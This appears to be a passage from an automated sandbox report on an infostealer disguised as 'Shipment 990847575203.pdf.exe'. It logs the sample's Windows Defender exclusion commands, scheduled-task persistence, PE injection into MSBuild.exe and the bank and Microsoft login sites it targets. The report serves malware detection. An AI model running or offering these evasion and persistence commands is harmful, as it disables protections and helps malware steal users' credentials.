                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599764
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599516
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599401
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598983
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597325
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596387
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594078
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Shipment 990847575203.pdf.exe, 00000000.00000002.2440674373.0000000008050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: HGfsvbGkGW
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: MSBuild.exe, 00000011.00000002.3574776920.0000000001237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: MSBuild.exe, 00000009.00000002.3575088087.0000000000B36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB9548 LdrInitializeThunk,17_2_06AB9548
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 61A008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F51008Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeQueries volume information: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
